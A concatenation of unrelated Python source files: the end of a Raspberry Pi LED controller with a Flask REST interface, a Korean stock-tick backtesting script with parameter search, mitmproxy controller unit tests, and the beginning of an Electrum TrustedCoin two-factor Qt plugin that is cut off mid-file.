'set_sat': [['saturation', int, 0], ['duration', float, 0]]
})
def _set_color(self, data):
try:
self.color = Color(data['color'])
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.level = self.color.lightness
self._set_last_on_timer()
self.led_r.level = self.color[0]
self.led_g.level = self.color[1]
self.led_b.level = self.color[2]
self.led_r._set_level()
self.led_g._set_level()
self.led_b._set_level()
self._update_color()
def inc(self, data={}):
if data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
data['level'] = 0
data['red'] = max(min(int(self.color[0]*100) + data['red'], 100), 0)
data['green'] = max(min(int(self.color[1]*100) + data['green'], 100), 0)
data['blue'] = max(min(int(self.color[2]*100) + data['blue'], 100), 0)
self.fade(data)
def dec(self, data={}):
if data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
data['level'] = 0
data['red'] = max(min(int(self.color[0]*100) - data['red'], 100), 0)
data['green'] = max(min(int(self.color[1]*100) - data['green'], 100), 0)
data['blue'] = max(min(int(self.color[2]*100) - data['blue'], 100), 0)
self.fade(data)
def upto(self, data):
data.update({
'red': max(self.color[0]*100, data['level']),
'green': max(self.color[1]*100, data['level']),
'blue': max(self.color[2]*100, data['level']),
'level': 0
})
self.fade(data)
def downto(self, data):
data.update({
'red': min(self.color[0]*100, data['level']),
'green': min(self.color[1]*100, data['level']),
'blue': min(self.color[2]*100, data['level']),
'level': 0
})
self.fade(data)
def on(self, data):
self.fade({'color': self.last_on_color.html, 'duration': data['duration']})
def off(self, data):
self.fade({'color': 'black', 'duration': data['duration']})
def fade(self, data={}):
self._update_color()
defaults = {'red': 0, 'green': 0, 'blue': 0, 'color': 'black', 'level': 0}
defaults.update(data)
data = defaults
if data['color'] and not data['level'] and not data['red'] and not data['green'] and not data['blue']:
r,g,b = Color(data['color'])
data['red'] = r*100
data['green'] = g*100
data['blue'] = b*100
elif data['level'] and not data['red'] and not data['green'] and not data['blue']:
data['red'] = data['green'] = data['blue'] = data['level']
self.led_r.fade({'level': data['red'], 'duration': data['duration']})
self.led_g.fade({'level': data['green'], 'duration': data['duration']})
self.led_b.fade({'level': data['blue'], 'duration': data['duration']})
self.color = Color(
self.led_r.target/100,
self.led_g.target/100,
self.led_b.target/100
)
def toggle(self, data={}):
toggling = self.led_r.toggling + self.led_g.toggling + self.led_b.toggling
self._update_color()
if self.color.lightness or 'on' in toggling:
self.led_r.toggling = 'off'
self.led_g.toggling = 'off'
self.led_b.toggling = 'off'
self.led_r.off(data)
self.led_g.off(data)
self.led_b.off(data)
else:
r,g,b = self.last_on_color
self.led_r.toggling = self.led_g.toggling = self.led_b.toggling = 'on'
data.update({'level': r*100})
self.led_r.on(data)
data.update({'level': g*100})
self.led_g.on(data)
data.update({'level': b*100})
self.led_b.on(data)
def set_color(self, data=None):
try:
self.color = Color(data['color'])
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_hsv(self, data=None):
try:
self.color = Color(
h=data['hue']/100,
s=data['saturation']/100,
v=data['value']/100
)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_hue(self, data=None):
try:
h,s,v = self.color.hsv
self.color = Color(h=data['hue']/100, s=s, v=v)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def set_sat(self, data=None):
try:
h,s,v = self.color.hsv
self.color = Color(h=h, s=data['saturation']/100, v=v)
except Exception:
self.color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.apply_color(data)
def apply_color(self, data=None):
self.fade({
'red' : self.color[0]*100,
'green': self.color[1]*100,
'blue' : self.color[2]*100,
'duration': data['duration']
})
def _update_color(self):
self.color = Color(
self.led_r.level/100,
self.led_g.level/100,
self.led_b.level/100
)
self.level = int(self.color.lightness * 100)
def _set_last_on(self):
if self.color.lightness:
self.last_on_color = self.color
self.last_on_timer = None
def _get_status(self):
return {
'color' : self.color.html,
'level' : self.color.lightness,
'switch': 'on' if self.color.lightness else 'off'
}
if HAVE_REST:
app = Flask(__name__)
def parse_config():
if config.sections():
for section in config.sections():
if section == 'mqtt' or section == 'rest':
continue
level = config[section].get('default', 'off').lower()
pintype = config[section].get('type', 'onoff').lower()
pin = config[section].get('pin', None)
# Setup LED driver based on pintype
if pintype == 'onoff':
leds[section] = LEDPin(section, pin, level)
elif pintype == 'pwm':
leds[section] = LEDPWM(section, pin, level)
elif pintype == 'rgb':
leds[section] = LEDRGB(section,
config[section]['red'],
config[section]['green'],
config[section]['blue'],
config[section].get('default', 'black').lower()
)
elif pintype == 'pca9685':
leds[section] = LEDPCA(section, pin, level)
elif pintype == 'pcargb':
leds[section] = LEDPCARGB(section,
config[section]['red'],
config[section]['green'],
config[section]['blue'],
config[section].get('default', 'black').lower()
)
else:
raise Exception(f"[{section}] unknown pin type '{pintype}'")
if 'mqtt' not in config.sections():
config['mqtt'] = {'topic': 'led', 'broker': 'mqtt-broker'}
if 'rest' not in config.sections():
config['rest'] = {'port': 8123}
else:
# Default to using a single PWM LED on pin 18
leds['led'] = LEDPWM('led', PWM_PIN, 0)
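# Illustrative /etc/led-controller.ini layout that parse_config() expects; the section names and
# pin numbers here are assumptions, only the keys and type values come from the code above:
#   [desk_lamp]
#   type = pwm
#   pin = 18
#   default = off
#
#   [strip]
#   type = pcargb
#   red = 0
#   green = 1
#   blue = 2
#   default = black
#
#   [mqtt]
#   topic = led
#   broker = mqtt-broker
#
#   [rest]
#   port = 8123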
def rest_listen():
base_url = config['rest'].get('base', '')
if base_url:
base_url = '/' + base_url
@app.route(base_url + '/<name>/<func>', methods=['GET'])
@app.route(base_url + '/<name>/<func>/<argone>', methods=['GET'])
@app.route(base_url + '/<name>/<func>/<argone>/<argtwo>', methods=['GET'])
def dispatch(name, func, argone=None, argtwo=None):
if name in leds:
led = leds[name]
if func in led.commands:
data = {'cmd': func}
led._set_default_args_rest(data, [argone, argtwo])
led.prev_status = led._get_status()
led.commands[func](data)
return led.send_status()
else:
abort(404)
else:
abort(404)
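    # Example requests this dispatcher accepts, assuming a configured device named 'desk_lamp'
    # and that the positional URL arguments map onto each command's default argument list:
    #   GET /desk_lamp/on
    #   GET /desk_lamp/fade/50/2   (fade to level 50 over 2 seconds)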
print(f"REST interface listening on port {config['rest']['port']} with url={base_url}/")
app.run(host='0.0.0.0', port=config['rest']['port'])
if __name__ == '__main__':
leds = {}
wiringPiSetupGpio()
if HAVE_PCA:
try:
pca = PCA9685(busio.I2C(SCL, SDA))
pca.frequency = 1000
except ValueError:
HAVE_PCA = False
config = configparser.ConfigParser()
config.read('/etc/led-controller.ini')
parse_config()
if HAVE_REST:
rest_thread = Thread(target=rest_listen)
rest_thread.start()
try:
Event().wait()
except KeyboardInterrupt:
os._exit(1)
|
backtester_stock_vc.py
|
import os
import sys
import sqlite3
import pandas as pd
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import DB_SETTING, DB_BACKTEST, DB_STOCK_TICK, GRAPH_PATH
from utility.static import now, strf_time, strp_time, timedelta_sec, timedelta_day
class BackTester1Stock:
def __init__(self, q_, code_list_, num_, df_mt_, high):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.high = high
if type(num_[5]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5][0]
self.avg_time = num_[6][0]
self.gap_sm = num_[7][0]
self.ch_low = num_[8][0]
self.dm_low = num_[9][0]
self.per_low = num_[10][0]
self.per_high = num_[11][0]
self.cs_per = num_[12][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5]
self.avg_time = num_[6]
self.gap_sm = num_[7]
self.ch_low = num_[8]
self.dm_low = num_[9]
self.per_low = num_[10]
self.per_high = num_[11]
self.cs_per = num_[12]
self.code = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.csell = 0
self.Start()
def Start(self):
conn = sqlite3.connect(DB_STOCK_TICK)
tcount = len(self.code_list)
int_daylimit = int(strf_time('%Y%m%d', timedelta_day(-self.testperiod)))
for k, code in enumerate(self.code_list):
self.code = code
self.df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
self.df = self.df.set_index('index')
self.df['직전거래대금'] = self.df['거래대금'].shift(1)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['거래대금평균'] = self.df['직전거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) < int_daylimit or \
(not self.hold and (self.endtime <= int(index[8:]) or int(index[8:]) < self.starttime)):
continue
self.index = index
self.indexn = h
self.ccond += 1
if not self.hold and self.starttime < int(index[8:]) < self.endtime and self.BuyTerm():
self.Buy()
elif self.hold and self.starttime < int(index[8:]) < self.endtime and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= self.endtime > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
try:
if self.code not in self.df_mt['거래대금상위100'][self.index]:
self.ccond = 0
else:
self.ccond += 1
except KeyError:
return False
if self.ccond < self.avg_time:
return False
        # Strategy not disclosed (proprietary)
return True
def Buy(self):
if self.df['매도호가1'][self.index] * self.df['매도잔량1'][self.index] >= self.batting:
s1hg = self.df['매도호가1'][self.index]
self.buycount = int(self.batting / s1hg)
self.buyprice = s1hg
else:
s1hg = self.df['매도호가1'][self.index]
s1jr = self.df['매도잔량1'][self.index]
s2hg = self.df['매도호가2'][self.index]
ng = self.batting - s1hg * s1jr
s2jc = int(ng / s2hg)
self.buycount = s1jr + s2jc
self.buyprice = round((s1hg * s1jr + s2hg * s2jc) / self.buycount, 2)
if self.buycount == 0:
return
self.hold = True
self.indexb = self.indexn
self.csell = 0
def SellTerm(self):
if self.df['등락율'][self.index] > 29:
return True
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
        # Strategy not disclosed (proprietary)
return False
def Sell(self):
if self.df['매수잔량1'][self.index] >= self.buycount:
self.sellprice = self.df['매수호가1'][self.index]
else:
b1hg = self.df['매수호가1'][self.index]
b1jr = self.df['매수잔량1'][self.index]
b2hg = self.df['매수호가2'][self.index]
nc = self.buycount - b1jr
self.sellprice = round((b1hg * b1jr + b2hg * nc) / self.buycount, 2)
self.hold = False
self.CalculationEyun()
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
if self.high:
self.q.put([self.index, self.code, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
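        # Net profit after costs, per the constants below: 0.23% transaction tax on the sell
        # amount and 0.015% brokerage fee on each side, with the tax truncated to whole won
        # and the fees truncated down to 10-won units.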
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
avgholdday = round(self.totalholdday / self.totalcount, 2)
self.q.put([self.code, self.totalcount, avgholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, avgholdday)
print(f" 종목코드 {self.code} | 평균보유기간 {avgholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.code, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, avgholdday):
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
avgholdday = str(avgholdday)
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 1 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 2 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 3 else avgholdday
avgholdday = avgholdday + '0' if len(avgholdday.split('.')[1]) == 1 else avgholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_, df1_):
super().__init__()
self.q = q_
self.last = last_
self.name = df1_
if type(num_[5]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5][0]
self.avg_time = num_[6][0]
self.gap_sm = num_[7][0]
self.ch_low = num_[8][0]
self.dm_low = num_[9][0]
self.per_low = num_[10][0]
self.per_high = num_[11][0]
self.cs_per = num_[12][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.starttime = num_[3]
self.endtime = num_[4]
self.gap_ch = num_[5]
self.avg_time = num_[6]
self.gap_sm = num_[7]
self.ch_low = num_[8]
self.dm_low = num_[9]
self.per_low = num_[10]
self.per_high = num_[11]
self.cs_per = num_[12]
self.Start()
def Start(self):
columns1 = ['거래횟수', '평균보유기간', '익절', '손절', '승률', '수익률', '수익금']
columns2 = ['필요자금', '종목출현빈도수', '거래횟수', '평균보유기간', '익절', '손절', '승률',
'평균수익률', '수익률합계', '수익금합계', '체결강도차이', '평균시간', '거래대금차이',
'체결강도하한', '누적거래대금하한', '등락율하한', '등락율상한', '청산수익률']
df_back = pd.DataFrame(columns=columns1)
df_tsg = pd.DataFrame(columns=['종목명', 'per', 'ttsg'])
k = 0
while True:
data = self.q.get()
if len(data) == 4:
name = self.name['종목명'][data[1]]
if data[0] in df_tsg.index:
df_tsg.at[data[0]] = df_tsg['종목명'][data[0]] + ';' + name, \
df_tsg['per'][data[0]] + data[2], \
df_tsg['ttsg'][data[0]] + data[3]
else:
df_tsg.at[data[0]] = name, data[2], data[3]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
tsp = 0
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low,
self.per_low, self.per_high, self.cs_per]
print(f' {text}')
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
df_back_ = df_back[df_back['평균보유기간'] != 0]
avghold = round(df_back_['평균보유기간'].sum() / len(df_back_), 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
onedaycount = round(tc / self.totaltime, 4)
onegm = int(self.batting * onedaycount * avghold)
if onegm < self.batting:
onegm = self.batting
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(self.batting, ',')}원, 필요자금 {format(onegm, ',')}원, "\
f" 종목출현빈도수 {onedaycount}개/초, 거래횟수 {tc}회, 평균보유기간 {avghold}초,\n 익절 {pc}회, "\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
df_back = pd.DataFrame(
[[onegm, onedaycount, tc, avghold, pc, mc, pper, avgsp, tsp, tsg, self.gap_ch, self.avg_time,
self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.cs_per]],
columns=columns2, index=[strf_time('%Y%m%d%H%M%S')])
conn = sqlite3.connect(DB_BACKTEST)
df_back.to_sql(f"{strf_time('%Y%m%d')}_1c", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) > 0:
df_tsg['체결시간'] = df_tsg.index
df_tsg.sort_values(by=['체결시간'], inplace=True)
df_tsg['ttsg_cumsum'] = df_tsg['ttsg'].cumsum()
df_tsg[['ttsg', 'ttsg_cumsum']] = df_tsg[['ttsg', 'ttsg_cumsum']].astype(int)
conn = sqlite3.connect(DB_BACKTEST)
df_tsg.to_sql(f"{strf_time('%Y%m%d')}_it", conn, if_exists='replace', chunksize=1000)
conn.close()
df_tsg.plot(figsize=(12, 9), rot=45)
plt.savefig(f"{GRAPH_PATH}/S{strf_time('%Y%m%d')}_1.png")
conn = sqlite3.connect(DB_SETTING)
cur = conn.cursor()
query = f"UPDATE stock SET 종목당투자금 = {self.batting}, 백테스팅기간 = {self.testperiod}, "\
f"백테스팅시간 = {self.totaltime}, 시작시간 = {self.starttime}, 종료시간 = {self.endtime}, "\
f"체결강도차이 = {self.gap_ch}, 평균시간 = {self.avg_time}, 거래대금차이 = {self.gap_sm}, "\
f"체결강도하한 = {self.ch_low}, 누적거래대금하한 = {self.dm_low}, 등락율하한 = {self.per_low}, "\
f"등락율상한 = {self.per_high}, 청산수익률 = {self.cs_per}"
cur.execute(query)
conn.commit()
conn.close()
else:
self.q.put(tsp)
if __name__ == "__main__":
start = now()
con = sqlite3.connect(DB_STOCK_TICK)
df1 = pd.read_sql('SELECT * FROM codename', con)
df1 = df1.set_index('index')
df2 = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df3 = pd.read_sql('SELECT * FROM moneytop', con)
df3 = df3.set_index('index')
con.close()
table_list = list(df2['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
last = len(table_list)
q = Queue()
batting = int(sys.argv[1]) * 1000000
testperiod = int(sys.argv[2])
totaltime = int(sys.argv[3])
starttime = int(sys.argv[4])
endtime = int(sys.argv[5])
gap_chs = [float(sys.argv[6]), float(sys.argv[7]), float(sys.argv[8]),
float(sys.argv[9]), float(sys.argv[10]), float(sys.argv[11]), float(sys.argv[12])]
avg_times = [int(sys.argv[15]), int(sys.argv[16]), int(sys.argv[17]),
int(sys.argv[18]), int(sys.argv[19]), int(sys.argv[20])]
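    # Rough map of the command-line arguments used by this script; the remaining argv slots
    # (13-14, 21-46) supply the search ranges and step sizes read further below:
    #   argv[1]        betting amount per stock, in units of 1,000,000 won
    #   argv[2]        backtest period in days
    #   argv[3]        total test time in seconds (used for the appearance-frequency figure)
    #   argv[4]/[5]    start/end time as HHMMSS integers
    #   argv[6]-[12]   candidate values for gap_ch
    #   argv[15]-[20]  candidate values for avg_time
    #   argv[47]       number of chunks the stock list is split into (one process per chunk)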
htsp = -1000
high_var = []
for gap_ch in gap_chs:
for avg_time in avg_times:
num = [batting, testperiod, totaltime, starttime, endtime, gap_ch, avg_time,
int(sys.argv[23]), float(sys.argv[27]), int(sys.argv[31]), float(sys.argv[35]),
float(sys.argv[39]), float(sys.argv[43])]
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, code_list, num, df3, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num
print(f' 최고수익률 갱신 {htsp}%')
gap_ch = [high_var[5] - float(sys.argv[13]) * 9, high_var[5] + float(sys.argv[13]) * 9,
float(sys.argv[13]), float(sys.argv[14])]
avg_time = [high_var[6], high_var[6], int(sys.argv[21]), int(sys.argv[22])]
gap_sm = [int(sys.argv[23]), int(sys.argv[24]), int(sys.argv[25]), int(sys.argv[26])]
ch_low = [float(sys.argv[27]), float(sys.argv[28]), float(sys.argv[29]), float(sys.argv[30])]
dm_low = [int(sys.argv[31]), int(sys.argv[32]), int(sys.argv[33]), int(sys.argv[34])]
per_low = [float(sys.argv[35]), float(sys.argv[36]), float(sys.argv[37]), float(sys.argv[38])]
per_high = [float(sys.argv[39]), float(sys.argv[40]), float(sys.argv[41]), float(sys.argv[42])]
cs_per = [float(sys.argv[43]), float(sys.argv[44]), float(sys.argv[45]), float(sys.argv[46])]
num = [batting, testperiod, totaltime, starttime, endtime,
gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, cs_per]
ogin_var = high_var[5]
high_var = high_var[5]
i = 5
while True:
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, code_list, num, df3, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num[i][0]
print(f' 최고수익률 갱신 {htsp}%')
if num[i][0] == num[i][1]:
num[i][0] = high_var
if num[i][2] != num[i][3]:
if num[i][0] != ogin_var:
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
elif i < len(num) - 1:
i += 1
ogin_var = num[i][0]
high_var = num[i][0]
if i == 6:
if num[i][0] != int(sys.argv[15]):
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
else:
break
num[i][0] = round(num[i][0] + num[i][2], 1)
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
db_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, db_list, num, df3, True))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f" 백테스팅 소요시간 {end - start}")
|
test_controller.py
|
from threading import Thread, Event
from mock import Mock
from mitmproxy import controller
from six.moves import queue
from mitmproxy.exceptions import Kill
from mitmproxy.proxy import DummyServer
from netlib.tutils import raises
class TMsg:
pass
class TestMaster(object):
def test_simple(self):
class DummyMaster(controller.Master):
@controller.handler
def log(self, _):
m.should_exit.set()
def tick(self, timeout):
# Speed up test
super(DummyMaster, self).tick(0)
m = DummyMaster()
assert not m.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
m.event_queue.put(("log", msg))
m.run()
assert m.should_exit.is_set()
def test_server_simple(self):
m = controller.Master()
s = DummyServer(None)
m.add_server(s)
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread(object):
def test_simple(self):
m = Mock()
t = controller.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel(object):
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock()
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.send(42)
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock()) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with raises(Kill):
channel.ask("test", Mock())
class TestDummyReply(object):
def test_simple(self):
reply = controller.DummyReply()
assert not reply.acked
reply.ack()
assert reply.acked
class TestReply(object):
def test_simple(self):
reply = controller.Reply(42)
assert not reply.acked
reply.send("foo")
assert reply.acked
assert reply.q.get() == "foo"
def test_default(self):
reply = controller.Reply(42)
reply.ack()
assert reply.q.get() == 42
def test_reply_none(self):
reply = controller.Reply(42)
reply.send(None)
assert reply.q.get() is None
|
qt.py
|
#!/usr/bin/env python3
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import partial
from threading import Thread
import re
import sys
from decimal import Decimal
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from electrumpq_gui.qt.util import *
from electrumpq_gui.qt.qrcodewidget import QRCodeWidget
from electrumpq_gui.qt.amountedit import AmountEdit
from electrumpq_gui.qt.main_window import StatusBarButton
from electrumpq.i18n import _
from electrumpq.plugins import hook
from .trustedcoin import TrustedCoinPlugin, server
class TOS(QTextEdit):
tos_signal = pyqtSignal()
error_signal = pyqtSignal(object)
class Plugin(TrustedCoinPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(QIcon(":icons/trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int = True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
@hook
def sign_tx(self, window, tx):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if not wallet.can_sign_without_server():
self.print_error("twofactor:sign_tx")
auth_code = None
if wallet.keystores['x3/'].get_tx_derivations(tx):
auth_code = self.auth_dialog(window)
else:
self.print_error("twofactor: xpub3 not needed")
window.wallet.auth_code = auth_code
def waiting_dialog(self, window, on_finished=None):
